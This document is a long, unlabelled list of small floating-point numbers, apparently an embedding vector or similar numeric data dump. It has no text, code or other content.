0.03567544370889664, -0.002643604064360261, -0.0004755317058879882, -0.016231480985879898, -0.007643731776624918, 0.0161892119795084, -0.004515789914876223, -0.011546613648533821, -0.0020535923540592194, -0.027334265410900116, 0.005227325949817896, -0.002597812097519636, -0.009285196661949158, 0.02602391131222248, -0.015005666762590408, -0.008883636444807053, 0.017386848106980324, -0.02927866205573082, 0.027052469551563263, -0.0351400300860405, 0.023600460961461067, -0.0057486495934426785, -0.00399446627125144, 0.009137253277003765, 0.010010822676122189, 0.011095739901065826, 0.022966420277953148, -0.010130586102604866, -0.022684622555971146, -0.002400554483756423, 0.03733804449439049, -0.001401937915943563, -0.03595723956823349, 0.03215298801660538, 0.02879960834980011, 0.015893325209617615, 0.0025942896027117968, 0.007939618080854416, 0.017161410301923752, 0.005181534215807915, -0.020740225911140442, -0.022078759968280792, -0.015005666762590408, 0.01378689706325531, 0.0079114381223917, -0.036577194929122925, -0.0006331616314128041, -0.006808909121900797, -0.01164524257183075, 0.02148698829114437, 0.053456805646419525, -0.01463933102786541, -0.009257016703486443, 0.02644660696387291, -0.0010215125512331724, -0.02019072324037552, -0.006791296880692244, 0.029588637873530388, -0.008165054954588413, -0.0017119140829890966, 0.01089848205447197, 0.037535302340984344, 0.007749405223876238, 0.004008556250482798, -0.00762964179739356, -0.03826797381043434, 0.005294252652674913, -0.002242043847218156, 0.01741502806544304, 0.0027140530291944742, -0.014364579692482948, 0.033533789217472076, -0.003776073921471834, 0.011983398348093033, 0.03483005613088608, 0.0299831535667181, 0.003066298784688115, -0.012730159796774387, 0.014977486804127693, 0.018936729058623314, -0.008348222821950912, -0.023530011996626854, -0.012363824062049389, 0.010905526578426361, -0.020867034792900085, -0.02751743420958519, 0.02506580390036106, -0.0378170982003212, 0.036098137497901917, 0.032406605780124664, -0.010384202934801579, 0.03421010076999664, 0.0330265574157238, 0.011849544942378998, 0.03204026818275452, -0.006217136513441801, 0.015315642580389977, -0.0033762750681489706, 0.005875458475202322, 0.026488875970244408, -0.035816341638565063, -0.015076115727424622, 0.03232206404209137, 0.023487742990255356, -0.0009880491998046637, -0.015019756741821766, 0.009623352438211441, -0.019429871812462807, 0.027559703215956688, -0.013808031566441059, -0.014420938678085804, -0.06154436990618706, 0.027320176362991333, 0.024727648124098778, 0.01656963676214218, -0.04035326838493347, 0.007559192832559347, -0.002446346450597048, -0.020754316821694374, -0.025981642305850983, 0.04824357107281685, -0.01296264212578535, -0.015160654671490192, 0.003680967492982745, 0.010081271640956402, 0.026432517915964127, 0.0072562615387141705, -0.02405133657157421, -0.0003656750777736306, -0.010743494145572186, 0.008968175388872623, 0.017062781378626823, 0.005255505908280611, -0.023980887606739998, 0.026263440027832985, 0.01869720220565796, 0.013498054817318916, -0.01499157678335905, -0.004716570023447275, -0.0185844823718071, -0.009334511123597622, 0.008594795130193233, 0.00468839006498456, -0.007164677605032921, 0.01944396272301674, -0.021895593032240868, 0.051906924694776535, 0.018034979701042175, -0.010701224207878113, 0.002511511789634824, 0.013420561328530312, -0.017767272889614105, 0.00381482089869678, 0.010412382893264294, -0.0036140407901257277, -0.008136875927448273, -0.013554414734244347, -0.006780729629099369, 0.000031729632610222325, -0.008235504850745201, -0.025093983858823776, -0.02045843005180359, 0.011941129341721535, 0.004649643320590258, -0.02382589876651764, -0.03142031654715538, -0.032462961971759796, 0.006192479282617569, -0.006174867041409016, 0.0006071834941394627, 0.021726515144109726, -0.01071531418710947, 0.012680845335125923, 0.020261172205209732, -0.017753183841705322, 0.006710280664265156, -0.0006269973237067461, 0.007062526419758797, 0.009588127955794334, -0.008270729333162308, -0.007474653888493776, -0.017964530736207962, 0.001888036960735917, 0.0019937106408178806, 0.014512523077428341, -0.007446473930031061, 0.026953840628266335, 0.0033886036835610867, 0.015512900426983833, 0.010588505305349827, 0.0016934211598709226, -0.026052091270685196, -0.01902126707136631, -0.024910815060138702, -0.021022023633122444, 0.019091716036200523, 0.015851056203246117, -0.020261172205209732, -0.005269595421850681, -0.01392074953764677, -0.03778892010450363, -0.038606129586696625, 0.020867034792900085, 0.016048314049839973, -0.0028989820275455713, -0.007742360234260559, 0.00023116123338695616, -0.030124051496386528, -0.03361833095550537, 0.0438193641602993, -0.0025379301514476538, 0.014167321845889091, -0.009073848836123943, -0.0013561459491029382, 0.0031596438493579626, 0.020965663716197014, 0.02870097942650318, -0.0141602773219347, 0.013645998202264309, -0.010243305005133152, -0.024868546053767204, 0.007819854654371738, -0.0073901149444282055, -0.00772122573107481, 0.006146687548607588, -0.003444962901994586, 0.000461001560324803, 0.020923394709825516, 0.011877724900841713, 0.007819854654371738, -0.01880992017686367, 0.007066048681735992, -0.010518056340515614, 0.016978243365883827, 0.013970063999295235, 0.009623352438211441, 0.0005001889076083899, -0.006664488464593887, -0.01143389567732811, 0.00045615818817168474, -0.01607649400830269, -0.002099384320899844, -0.020120274275541306, -0.0025396915152668953, 0.0020835332106798887, 0.03392830491065979, -0.02152925729751587, -0.036887168884277344, 0.016414649784564972, -0.02116292156279087, -0.0079114381223917, 0.01282174326479435, 0.0012945029884576797, 0.0019267839379608631, 0.007249216549098492, -0.027587883174419403, -0.019514411687850952, -0.02575620636343956, -0.01408278290182352, -0.01869720220565796, 0.026996109634637833, 0.01445616316050291, -0.007376024965196848, 0.012046802788972855, -0.02196604199707508, 0.0005948549369350076, 0.018020890653133392, -0.019894836470484734, 0.006266450975090265, 0.015343822538852692, -0.019274884834885597, 0.04133955389261246, -0.006682100705802441, 0.011342311277985573, 0.00008916218939702958, 0.018514033406972885, 0.011018245480954647, 0.001031199237331748, -0.019852567464113235, -0.026376157999038696, -0.026742493733763695, -0.03936697915196419, -0.03370286896824837, 0.008679334074258804, 0.012406093068420887, -0.033308353275060654, 0.02612254023551941, -0.019782118499279022, 0.026545235887169838, -0.01362486369907856, 0.006118507590144873, 0.03206845000386238, -0.011032335460186005, -0.001447729766368866, -0.047905415296554565, 0.00038504856638610363, 0.03319563344120979, -0.02405133657157421, -0.0035735326819121838, 0.041283197700977325, -0.042184945195913315, -0.001318279537372291, -0.01271606981754303, 0.003053970169275999, 0.0047553167678415775, 0.017908170819282532, 0.002816204447299242, 0.011440940201282501, -0.006777207367122173, -0.030124051496386528, -0.0000750723629607819, -0.01125072780996561, 0.007650776766240597, -0.019415782764554024, -0.0039803762920200825, -0.020162543281912804, 0.02533351071178913, -0.031871192157268524, -0.025713935494422913, -0.026488875970244408, -0.04604555666446686, -0.03392830491065979, -0.010940751060843468, 0.014272995293140411, -0.008186190389096737, 0.009496544487774372, 0.01955668069422245, -0.004917350132018328, 0.017598195001482964, -0.012455407530069351, 0.006537680048495531, -0.0056746783666312695, 0.018725382164120674, 0.00881318747997284, 0.009355645626783371, -0.0007533655152656138, -0.008658199571073055, 0.03429464250802994, 0.0032318541780114174, 0.005255505908280611, -0.0025837221182882786, 0.0007700971327722073, 0.00003582999124773778, -0.00495609687641263, -0.010778718627989292, 0.015780607238411903, -0.012997866608202457, -0.033421073108911514, -0.03888792544603348, -0.02383998967707157, 0.02238873578608036, 0.007995977066457272, 0.026897480711340904, -0.008059381507337093, -0.004927917383611202, -0.01628784090280533, -0.011285952292382717, 0.010412382893264294, 0.017725003883242607, -0.01370235811918974, -0.01100415550172329, -0.012511767446994781, -0.041001398116350174, 0.012920372188091278, -0.031166698783636093, -0.013674178160727024, 0.007693046238273382, 0.006322810426354408, -0.0010805136989802122, -0.0165132787078619, 0.0048116762191057205, -0.008855456486344337, 0.02970135770738125, -0.008742738515138626, -0.026700224727392197, -0.011610018089413643, -0.01816178858280182, -0.015498810447752476, 0.010264439508318901, -0.00367392273619771, -0.0212192814797163, 0.01201862283051014, 0.012849923223257065, -0.005776829551905394, -0.004152976907789707, -0.005487987771630287, 0.05776829272508621, 0.01333602238446474, 0.03226570412516594, -0.014568882063031197, -0.006058625876903534, -0.029419559985399246, 0.014540702104568481, -0.005114607512950897, -0.0007309098145924509, 0.02720745839178562, 0.017076872289180756, -0.015400181524455547, 0.01603422500193119, -0.015372002497315407, 0.030011333525180817, -0.011617063544690609, -0.004255128093063831, 0.03412556275725365, 0.014110962860286236, 0.02168424427509308, -0.0036915349774062634, 0.021656066179275513, 0.0001875708403531462, -0.01859857328236103, 0.017006421461701393, 0.013124674558639526, -0.019317153841257095, 0.02665795385837555, -0.04841264709830284, -0.016978243365883827, -0.046186454594135284, 0.013596683740615845, -0.01226519513875246, 0.005392881575971842, -0.004949051886796951, 0.014949307776987553, 0.024755828082561493, -0.009602217935025692, 0.005790919065475464, 0.0023582850117236376, -0.03615449741482735, -0.004258650355041027, -0.019190344959497452, -0.009954463690519333, 0.0070907059125602245, 0.002522079274058342, 0.03316745534539223, -0.01571015827357769, -0.008143920451402664, -0.020557058975100517, 0.011081649921834469, 0.0005288088577799499, 0.030321309342980385, 0.002930684247985482, -0.023262305185198784, 0.01472386997193098, -0.002798591973260045, 0.0034660976380109787, 0.0038958373479545116, 0.03821161389350891, -0.024558570235967636, 0.01544245146214962, -0.014737959951162338, -0.012462452985346317, 0.028123296797275543, -0.0046355533413589, -0.003969809040427208, -0.01461115200072527, 0.0168796144425869, -0.030856722965836525, 0.007812809199094772, -0.00865115411579609, -0.010348978452384472, 0.035027313977479935, 0.00754510285332799, -0.006118507590144873, -0.039451517164707184, 0.010236259549856186, 0.011680467054247856, -0.0014767900574952364, 0.015076115727424622, 0.0016361812595278025, 0.0013852062402293086, 0.019458051770925522, -0.0165132787078619, 0.0492580384016037, -0.002529124030843377, 0.019993465393781662, -0.028095116838812828, -0.03119487874209881, -0.05889547988772392, -0.03832433372735977, 0.002893698401749134, 0.006308720447123051, -0.034491900354623795, -0.016499187797307968, 0.01301195565611124, 0.030603107064962387, 0.017020512372255325, -0.036887168884277344, 0.017119141295552254, -0.019796207547187805, -0.02393861673772335, -0.00627701822668314, -0.018020890653133392, -0.015104295685887337, 0.011159143410623074, -0.026911571621894836, -0.011610018089413643, 0.018133608624339104, 0.013899615034461021, -0.01586514711380005, -0.03471733629703522, 0.009235882200300694, 0.010750538669526577, 0.00654472503811121, 0.02500944398343563, -0.03559090569615364, 0.01864084228873253, 0.032519321888685226, 0.029081404209136963, -0.009031579829752445, -0.015287463553249836, 0.004505222663283348, -0.0013394142733886838, 0.00255025876685977, -0.028729159384965897, 0.010158766061067581, -0.011342311277985573, -0.006044536363333464, 0.012131341733038425, 0.04232584312558174, 0.015893325209617615, -0.031392138451337814, -0.026319798082113266, -0.005924772471189499, 0.01544245146214962, 0.029025046154856682, 0.012568126432597637, -0.0004242359136696905, -0.031927548348903656, 0.03136395663022995, 0.010024912655353546, 0.04680640995502472, -0.03483005613088608, 0.012737204320728779, -0.029644997790455818, -0.011229593306779861, 0.01207498274743557, 0.00961630791425705, 0.01079280860722065, -0.007925528101623058, -0.031279418617486954, 0.020387981086969376, -0.011264817789196968, -0.020430250093340874, -0.005040635820478201, -0.0011853068135678768, 0.021402448415756226, 0.015005666762590408, 0.011483210138976574, 0.005720470100641251, 0.0011069320607930422, -0.004427728243172169, -0.007798719685524702, 0.028038756921887398, -0.000003928365003957879, 0.006896970793604851, -0.016851434484124184, -0.01865493133664131, -0.029306842014193535, -0.009066804312169552, -0.015188834629952908, 0.0017189589561894536, 0.0035118896048516035, -0.01634420081973076, 0.0036985797341912985, 0.003457291517406702, -0.02558712661266327, -0.013223303481936455, -0.01703460142016411, -0.02794012799859047, -0.008961130864918232, -0.022895971313118935, -0.01089848205447197, -0.014568882063031197, -0.013223303481936455, 0.007855079136788845, 0.07185812294483185, 0.028038756921887398, -0.01461115200072527, 0.0077846297062933445, 0.00036039139376953244, -0.014484343118965626, 0.024333132430911064, -0.0276301521807909, 0.020923394709825516, -0.00006323910929495469, 0.025023534893989563, -0.0010127064306288958, -0.014442073181271553, -0.0058085317723453045, 0.021557437255978584, -0.005928295198827982, 0.00801006704568863, 0.0035946674179285765, -0.0020571148488670588, 0.016654176637530327, -0.038662489503622055, 0.022726891562342644, -0.000019235916624893434, -0.032406605780124664, 0.014582972042262554, -0.0034608140122145414, 0.007270351052284241, -0.006974464748054743, -0.014322309754788876, -0.006925150286406279, -0.02489672601222992, -0.010024912655353546, 0.0036351755261421204, -0.001735690631903708, -0.00467430055141449, -0.02667204476892948, -0.026418427005410194, -0.015625618398189545, -0.008594795130193233, -0.001415147096849978, 0.005343567114323378, 0.007140020374208689, -0.007636686787009239, -0.01319512352347374, 0.009285196661949158, -0.027080649510025978, 0.010637819766998291, 0.01164524257183075, 0.017513656988739967, -0.012561081908643246, -0.009426094591617584, -0.0029993720818310976, -0.00021200788614805788, 0.027503343299031258, -0.008129830472171307, -0.0025925282388925552, 0.004374891519546509, 0.014258906245231628, -0.010010822676122189, -0.015132475644350052, -0.007002644706517458, -0.005125174764543772, 0.003295258618891239, -0.006949807517230511, 0.028334643691778183, 0.00772122573107481, -0.0027651286218315363, 0.006660966202616692, 0.013885525055229664, 0.006030446384102106, 0.022726891562342644, 0.014301175251603127, -0.006481321062892675, 0.003238899167627096, 0.013307842426002026, 0.03874702751636505, 0.009116118773818016, -0.008291863836348057, -0.0138362105935812, -0.003342811716720462, 0.03328017517924309, 0.0017400936922058463, 0.000979243079200387, 0.008517300710082054, -0.029109584167599678, 0.017823632806539536, 0.007284441031515598, 0.010236259549856186, -0.0040930951945483685, -0.008862501941621304, -0.0026207079645246267, 0.008911816403269768, 0.013491010293364525, -0.0005776829202659428, 0.008679334074258804, -0.011497299186885357, -0.002925400622189045, 0.004695435054600239, -0.008143920451402664, -0.03297019749879837, 0.018711291253566742, 0.014132097363471985, 0.0027616063598543406, 0.010743494145572186, -0.0067666396498680115, 0.021444717422127724, 0.013765761628746986, 0.03840887174010277, 0.004829288460314274, 0.004769406747072935, -0.0071717225946486, 0.014181411825120449, -0.008911816403269768, -0.01789408177137375, -0.03826797381043434, -0.012420183047652245, -0.002446346450597048, -0.0005503838765434921, 0.020387981086969376, -0.030603107064962387, -0.011490254662930965, -0.02340320497751236, -0.01811951957643032, -0.01726003922522068, -0.00029962899861857295, 0.008165054954588413, -0.046834588050842285, 0.007319665513932705, 0.003053970169275999, 0.0004724495520349592, 0.0006591397686861455, 0.05199146643280983, -0.004297397565096617, -0.012849923223257065, 0.024981264024972916, 0.007432384416460991, -0.017922261729836464, 0.00030072976369410753, -0.00613259756937623, 0.009686756879091263, -0.03595723956823349, 0.02841918356716633, 0.003850045381113887, 0.012631530873477459, 0.017879990860819817, 0.0031085682567209005, -0.009355645626783371, 0.0014125052839517593, 0.011624108068645, 0.007048436440527439, 0.01009536162018776, -0.025784384459257126, 0.01565379835665226, 0.027277907356619835, 0.00011558061669347808, -0.014512523077428341, -0.013850300572812557, 0.0061255525797605515, -0.008305953815579414, -0.008460941724479198, 0.015217014588415623, 0.01966940052807331, 0.016541458666324615, 0.00873569305986166, 0.013512144796550274, 0.022515544667840004, -0.007749405223876238, 0.00889772642403841, -0.022163299843668938, -0.013857346028089523, -0.010644865222275257, 0.018302686512470245, -0.003092717146500945, -0.02030344121158123, 0.0016141659580171108, -0.013047181069850922, -0.0011923516867682338, 0.01982438750565052, 0.006340422667562962, -0.008432761766016483, -0.0036386980209499598, 0.015681978315114975, 0.011898859404027462, -0.006428483873605728, 0.03218116611242294, -0.03719714656472206, -0.01079280860722065, 0.009249972179532051, -0.04232584312558174, 0.012434273026883602, 0.02206467092037201, 0.013744627125561237, -0.01869720220565796, -0.020909303799271584, -0.020331621170043945, -0.000656497897580266, -0.007819854654371738, -0.009602217935025692, 0.007059003692120314, 0.0074112494476139545, 0.012856967747211456, -0.0006679458892904222, 0.017062781378626823, 0.009412004612386227, -0.02152925729751587, -0.013667132705450058, -0.018556304275989532, 0.0048645129427313805, 0.01424481626600027, 0.01757001504302025, 0.015372002497315407, -0.021571526303887367, -0.0061502098105847836, 0.0330265574157238, 0.01060964073985815, 0.01370940264314413, 0.007862123660743237, -0.011743871495127678, 0.006646876223385334, 0.016583727672696114, -0.0033392892219126225, 0.013829166069626808, 0.009404960088431835, -0.045763760805130005, -0.006005789153277874, 0.020063914358615875, 0.05114607512950897, 0.015639709308743477, 0.008482076227664948, -0.007073093671351671, -0.0006322810077108443, 0.011215503327548504, 0.0037091472186148167, -0.03519639000296593, -0.000008929979230742902, -0.014597062021493912, -0.0009378541726619005, -0.0021504599135369062, 0.004498177673667669, -0.008404582738876343, 0.00255025876685977, -0.0048645129427313805, -0.017386848106980324, -0.013843256048858166, -0.004233993124216795, -0.00021167764498386532, 0.007805764675140381, 0.026531146839261055, -0.005667633377015591, 0.005917727947235107, -0.013554414734244347, 0.019514411687850952, 0.011116874404251575, -0.005780351813882589, -0.013491010293364525, 0.03697170689702034, 0.0013482203939929605, 0.009369735606014729, 0.019894836470484734, -0.008594795130193233, 0.0188662800937891, 0.0016027179080992937, 0.0003240660298615694, -0.015752427279949188, -0.023797718808054924, 0.03925425931811333, -0.012229970656335354, 0.014019378460943699, 0.011398671194911003, 0.019429871812462807, -0.03683080896735191, 0.009123163297772408, 0.011610018089413643, 0.01634420081973076, -0.0063157654367387295, 0.011772051453590393, 0.007305576000362635, 0.006932195276021957, -0.04102957993745804, 0.005273118149489164, -0.002074727090075612, 0.01757001504302025, 0.002854951424524188, -0.014167321845889091, 0.0027034857776015997, 0.011215503327548504, -0.013667132705450058, 0.023149587213993073, -0.009172477759420872, -0.019908927381038666, 0.01938760280609131, -0.014167321845889091, -0.01896490901708603, -0.007425339426845312, -0.002515034284442663, -0.00900339987128973, -0.006368602160364389, 0.021022023633122444, 0.017245950177311897, -0.0017189589561894536, 0.010208080522716045, -0.00801006704568863, -0.00542106106877327, 0.01907762698829174, -0.0004381055769044906, 0.015301553532481194, -0.0031191357411444187, -0.013491010293364525, -0.006777207367122173, -0.002842622809112072, -0.0034537690225988626, -0.019641220569610596, -0.0012460692087188363, -0.012004533782601357, 0.032772939652204514, 0.005406971555203199, 0.0035312632098793983, 0.018556304275989532, 0.022106939926743507, -0.045171987265348434, 0.0023265827912837267, 0.026855211704969406, 0.021923772990703583, 0.003860612865537405, 0.004480565432459116, 0.015428361482918262, -0.010806897655129433, 0.001446849200874567, -0.008559570647776127, -0.0038782251067459583, -0.008559570647776127, 0.016231480985879898, -0.00308567238971591, 0.02013436332345009, -0.02275507152080536, -0.015104295685887337, 0.004519312176853418, -0.008806142024695873, 0.0020588762126863003, -0.003464336507022381, -0.005794441793113947, 0.012096117250621319, 0.0004050825664307922, 0.006432006601244211, -0.013716447167098522, 0.017499566078186035, 0.02713700942695141, -0.013385336846113205, -0.017781361937522888, 0.020049825310707092, -0.0011765005765482783, -0.025939373299479485, -0.022247837856411934, -0.012110207229852676, -0.014808408915996552, 0.015935596078634262, -0.001370235811918974, 0.006435528863221407, -0.018528124317526817, -0.012462452985346317, 0.008242549374699593, 0.005572527181357145, -0.026996109634637833, -0.03931061923503876, -0.031138518825173378, 0.008806142024695873, -0.00045483725261874497, -0.03626721724867821, -0.0012971448013558984, -0.004617941100150347, -0.009679711423814297, -0.00408605020493269, 0.014378669671714306, 0.008482076227664948, -0.01244836300611496, 0.055119406431913376, 0.029588637873530388, -0.01151843462139368, 0.010165810585021973, 0.030321309342980385, 0.014794318936765194, -0.009137253277003765, -0.006424961611628532, 0.026249349117279053, -0.02307913824915886, 0.016372380778193474, -0.00817914493381977, -0.005086428020149469, -0.024220414459705353, 0.00881318747997284, 0.011215503327548504, 0.007460563909262419, -0.014202546328306198, 0.012082027271389961, -0.02841918356716633, 0.01976802945137024, 0.012856967747211456, 0.009743115864694118, -0.0045122671872377396, -0.0007599701057188213, 0.008305953815579414, 0.01880992017686367, 0.008305953815579414, 0.006805386859923601, 0.02403724566102028, 0.002597812097519636, -0.01463933102786541, -0.04080414026975632, 0.024713559076189995, 0.03077218495309353, 0.02105020359158516, -0.0038958373479545116, -0.005745127331465483, -0.009158387780189514, 0.014568882063031197, -0.042833078652620316, 0.013991199433803558, -0.014526613056659698, 0.015696069225668907, 0.021980131044983864, -0.014977486804127693, 0.03189937025308609, -0.0032494666520506144, -0.01060964073985815, -0.010849167592823505, 0.015231103636324406, 0.01764046400785446, 0.002220909111201763, -0.020373892039060593, 0.016062403097748756, -0.011955219320952892, 0.017161410301923752, 0.0050758603028953075, 0.020472519099712372, -0.0038782251067459583, -0.014554792083799839, -0.0033533789683133364, 0.0009360929252579808, 0.017499566078186035, -0.012469497509300709, 0.0037338044494390488, 0.002240282716229558, -0.014935217797756195, -0.0062030465342104435, -0.00607976084575057, -0.01758410595357418, -0.009257016703486443, -0.025713935494422913, -0.03421010076999664, -0.0165555477142334, 0.042297665029764175, -0.017696823924779892, -0.02066977694630623, 0.022952329367399216, 0.017879990860819817, 0.01789408177137375, 0.00798893254250288, 0.006432006601244211, 0.00039825780550017953, -0.03356197103857994, -0.00055742880795151, 0.000022510701455757953, 0.007108318153768778, -0.02152925729751587, 0.0010602595284581184, 0.007175244856625795, -0.0026295140851289034, -0.023924527689814568, -0.0031931072007864714, -0.00846798624843359, 0.01098302099853754, -0.02164197526872158, -0.010109451599419117, 0.000007959927643241826, 0.01125072780996561, 0.0074112494476139545, -0.016921883448958397, -0.02009209431707859, 0.009264062158763409, 0.010701224207878113, 0.005586616694927216, -0.010567370802164078, -0.0036140407901257277, -0.011081649921834469, 0.007495788391679525, 0.010623730719089508, 0.0004654046206269413, 0.020655687898397446, -0.004875080659985542, 0.021937862038612366, -0.016597816720604897, -0.008573660627007484, -0.010778718627989292, 0.029025046154856682, 0.008129830472171307, 0.00006323910929495469, 0.008615929633378983, 0.011152098886668682, 0.023431383073329926, 0.011652288027107716, -0.008298908360302448, -0.0032371380366384983, -0.004829288460314274, -0.0025379301514476538, -0.003048686543479562, 0.001274248817935586, 0.006298153195530176, 0.004131841938942671, 0.009954463690519333, -0.006178389769047499, 0.029306842014193535, -0.011300042271614075, -0.013617818243801594, 0.019993465393781662, -0.018993088975548744, 0.0008704871870577335, -0.013934839516878128, 0.008263683877885342, -0.009158387780189514, -0.007006166968494654, 0.013026045635342598, 0.012046802788972855, -0.008066426031291485, -0.009581083431839943, -0.0021134743001312017, -0.003027551807463169, -0.02148698829114437, -0.007770540192723274, -0.004586238879710436, -0.007016734220087528, 0.013927794992923737, -0.00531538762152195, -0.004737704526633024, -0.011595928110182285, 0.0019796208944171667, 0.000026033158064819872, 0.0017004661494866014, 0.009214747697114944, 0.006164299789816141, -0.006629263982176781, 0.0046214633621275425, -0.03691535070538521, 0.0012346211588010192, 0.013202168978750706, -0.004336144775152206, 0.0029870434664189816, -0.024403581395745277, -0.015343822538852692, -0.020345712080597878, 0.0208952147513628, -0.01747138611972332, -0.004307964816689491, -0.017541835084557533, 0.0019355900585651398, 0.0003357341920491308, 0.012807653285562992, 0.00801006704568863, -0.003092717146500945, -0.02441767230629921, 0.0037056247238069773, 0.011398671194911003, -0.0022121029905974865, 0.013561459258198738, 0.0209374837577343, 0.013772807084023952, 0.000431941298302263, -0.007531012874096632, 0.014526613056659698, -0.005251983180642128, -0.0001595012581674382, -0.00543867377564311, 0.014681600965559483, 0.0013693551300093532, 0.008397537283599377, -0.0030557315330952406, 0.017598195001482964, 0.002425211714580655, 0.002971192356199026, 0.02319185622036457, 0.002222670242190361, 0.010391248390078545, 0.015245193615555763, -0.008186190389096737, 0.0022948808036744595, 0.008369358256459236, 0.006460186094045639, 0.010482831858098507, -0.024192234501242638, -0.014892947860062122, -0.0050758603028953075, -0.0069181052967906, -0.00042225452489219606, -0.026784762740135193, -0.0008414268959313631, -0.018175877630710602, 0.034914594143629074, -0.021303819492459297, -0.013166944496333599, 0.010102407075464725, 0.018781740218400955, -0.012624485418200493, 0.012666755355894566, -0.01333602238446474, -0.0009607501560822129, -0.0037302819546312094, -0.014125052839517593, 0.025178521871566772, -0.007728270720690489, -0.020613418892025948, -0.0029042658861726522, 0.007714180741459131, -0.011687512509524822, 0.007678956259042025, 0.013286707922816277, -0.013110584579408169, 0.016978243365883827, 0.0019109329441562295, 0.004015600774437189, -0.026841122657060623, 0.004639076068997383, -0.004494654946029186, 0.014709779992699623, -0.002043025102466345, -0.015428361482918262, 0.001389609300531447, -0.003027551807463169, 0.0030574926640838385, -0.012568126432597637, 0.016865523532032967, -0.004730659537017345, 0.012025668285787106, 0.02822192572057247, -0.0012328599113970995, 0.01381507609039545, 0.018344955518841743, 0.02565757744014263, -0.0007022898644208908, 0.008298908360302448, -0.021007932722568512, -0.017978619784116745, 0.008968175388872623, -0.0012513528345152736, 0.014153231866657734, -0.011067559942603111, -0.002169833518564701, -0.007925528101623058, 0.036943528801202774, -0.0030891948845237494, 0.012596306391060352, 0.02024708315730095, 0.02393861673772335, 0.010503966361284256, 0.00843980722129345, 0.001459177816286683, -0.006572904530912638, -0.025263061746954918, 0.010313753969967365, 0.0031596438493579626, 0.00617134477943182, 0.005230848677456379, 0.008601839654147625, -0.0020025167614221573, -0.009320421144366264, 0.007678956259042025, 0.029729537665843964, 0.004670777823776007, -0.014054602943360806, -0.020162543281912804, 0.017668643966317177, 0.021980131044983864, -0.006220659241080284, 0.015991954132914543, -0.0141602773219347, -0.001836961368098855, 0.015851056203246117, 0.0004614418721757829, -0.021895593032240868, -0.004860990680754185, -0.012969686649739742, -0.002145176287740469, -0.019725758582353592, 0.019838478416204453, -0.014780229888856411, -0.005030068568885326, -0.018359046429395676, -0.021501077339053154, 0.013004911132156849, -0.014420938678085804, -0.0015842249849811196, -0.0012980253668501973, 0.0028267716988921165, 0.017936350777745247, -0.009327465668320656, 0.010208080522716045, -0.020923394709825516, -0.024713559076189995, -0.014864768832921982, 0.009404960088431835, 0.009743115864694118, 0.0009440184803679585, 0.020965663716197014, -0.027390625327825546, -0.031335778534412384, 0.00048037507804110646, -0.019190344959497452, 0.015104295685887337, 0.003001133445650339, -0.03266021981835365, 0.018471764400601387, 0.0039028823375701904, 0.01517474465072155, -0.021036112681031227, -0.0009906910127028823, -0.011934083886444569, 0.026376157999038696, 0.004082527477294207, 0.009975598193705082, -0.01892263814806938, 0.0011060514952987432, 0.003642220515757799, 0.013829166069626808, 0.015541080385446548, 0.014258906245231628, -0.007700090762227774, -0.009334511123597622, -0.03313927352428436, 0.016372380778193474, -0.01234268955886364, -0.015231103636324406, 0.02554485760629177, 0.0015445974422618747, -0.019429871812462807, 0.018302686512470245, -0.005473898258060217, -0.000021932799427304417, 0.00982765480875969, -0.022966420277953148, -0.025840744376182556, 0.0033780361991375685, 0.0010356022976338863, 0.028813697397708893, 0.014357534237205982, -0.0031719724647700787, -0.010419427417218685, -0.003529501846060157, -0.006051580887287855, 0.006872313562780619, 0.002645365195348859, 0.00431500980630517, 0.024178145453333855, 0.013850300572812557, 0.011116874404251575, -0.00946131907403469, 0.008510256186127663, -0.024910815060138702, 0.004477042704820633, 0.002671783557161689, -0.012666755355894566, 0.0027563225012272596, -0.011384581215679646, 0.006569382268935442, -0.004209335893392563, -0.00982765480875969, -0.01509020570665598, 0.02484036609530449, 0.026855211704969406, -0.005012456327676773, -0.00634746765717864, -0.014033468440175056, -0.003680967492982745, -0.011779095977544785, -0.003177256090566516, 0.022135119885206223, 0.015935596078634262, 0.023234127089381218, 0.0038782251067459583, -0.0041142296977341175, -0.008129830472171307, -0.014047558419406414, 0.02692566066980362, 0.015555170364677906, -0.007608507294207811, -0.0010866780066862702, 0.014794318936765194, 0.014442073181271553, 0.002074727090075612, 0.010926662012934685, 0.0036598327569663525, 0.02516443282365799, -0.017541835084557533, 0.0009950940730050206, 0.01810542866587639, 0.011934083886444569, 0.003772551426663995, 0.0001667663163971156, -0.002303686924278736, 0.030546747148036957, 0.023614551872015, -0.000979243079200387, 0.0038711801171302795, 0.0006243555108085275, -0.0002994088572449982, -0.015076115727424622, -0.0025449751410633326, 0.0064460961148142815, 0.015400181524455547, 0.00045924034202471375, 0.042241305112838745, 0.014181411825120449, -0.0028250105679035187, 0.009306331165134907, 0.01191294938325882, -0.013181034475564957, 0.004015600774437189, -0.010158766061067581, 0.0017533029895275831, 0.0015542841283604503, 0.009898103773593903, 0.006601084489375353, 0.011574793606996536, -0.02516443282365799, -0.013385336846113205, 0.017879990860819817, -0.0158228762447834, 0.004029690753668547, -0.015696069225668907, 0.018288597464561462, 0.014878857880830765, 0.010370112955570221, -0.004610896110534668, -0.002247327473014593, -0.009771295823156834, 0.019218524917960167, -0.02719336748123169, 0.005072338040918112, 0.005466853268444538, -0.010193990543484688, -0.0018422449938952923, -0.006731415167450905, 0.00910907331854105, -0.0038782251067459583, -0.016259660944342613, 0.03156121447682381, 0.025418048724532127, -0.0063157654367387295, -0.01934533379971981, 0.013512144796550274, -0.00916543323546648, 0.0005094353691674769, -0.01215952169150114, 0.008397537283599377, 0.013244437985122204, -0.001011825748719275, 0.010489877313375473, -0.00028686010045930743, -0.003850045381113887, 0.006942762527614832, -0.021191101521253586, 0.011638198047876358, -0.005096995271742344, 0.03457643836736679, 0.007622596807777882, 0.023360934108495712, 0.010644865222275257, 0.005273118149489164, 0.0067138029262423515, 0.007742360234260559, -0.010658955201506615, -0.023177767172455788, 0.0073901149444282055, 0.004473520442843437, 0.01848585344851017, 0.03046220727264881, 0.0027439938858151436, -0.0019126941915601492, 0.0014424461405724287, 0.0012328599113970995, -0.01757001504302025, -0.023431383073329926, -0.031279418617486954, 0.01261039637029171, -0.004931439645588398, 0.00025053476565517485, -0.019063537940382957, 0.032350245863199234, -0.01378689706325531, -0.0018545736093074083, 0.015076115727424622, -0.0023019255604594946, -0.0003751416807062924, -0.02131791040301323, -0.0015445974422618747, -0.012596306391060352, -0.00008332812285516411, -0.001831677625887096, 0.014808408915996552, -0.021501077339053154, 0.0019091716967523098, -0.009066804312169552, 0.0015401942655444145, -0.01645691879093647, -0.02281143143773079, 0.02072613686323166, 